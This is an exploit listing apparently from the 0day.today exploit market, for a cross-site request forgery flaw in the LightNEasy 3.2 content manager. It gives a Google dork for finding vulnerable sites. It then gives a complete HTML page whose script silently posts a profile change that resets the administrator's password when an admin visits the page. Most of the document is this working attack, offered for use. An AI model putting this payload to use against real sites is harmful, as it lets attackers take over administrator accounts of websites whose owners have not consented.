[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

LightNEasy 3.2 admin account hijacking csrf vulnerability

Author
pimpim
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13522
Category
web applications
Date add
30-07-2010
Platform
php
=========================================================
LightNEasy 3.2 admin account hijacking csrf vulnerability
=========================================================

# Author: pimpim
# Software Link: http://www.lightneasy.org/addons/downloads/send.php?dlid=125
# Version: [app version]
# Google dork : Powered by LightNEasy Content Manager
# Platform / Tested on: Ubuntu Linux
# Category: webapps/0day
# Code :
<html>
	<head>
		<script>
			var http=new XMLHttpRequest();
			http.open("POST", "http://localhost/lne/LightNEasy.php?do=profile");
			http.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
			http.send("handle=admin&password=admin2&repeatpassword=admin2&email=admin%40admin.com&firstname=&lastname=&website=&location=&submit=saveprofile&userid=1&aaa=Save+changes");	
		</script>
	</head>
	<body>
	</body>
</html>



#  0day.today [2024-12-25]  #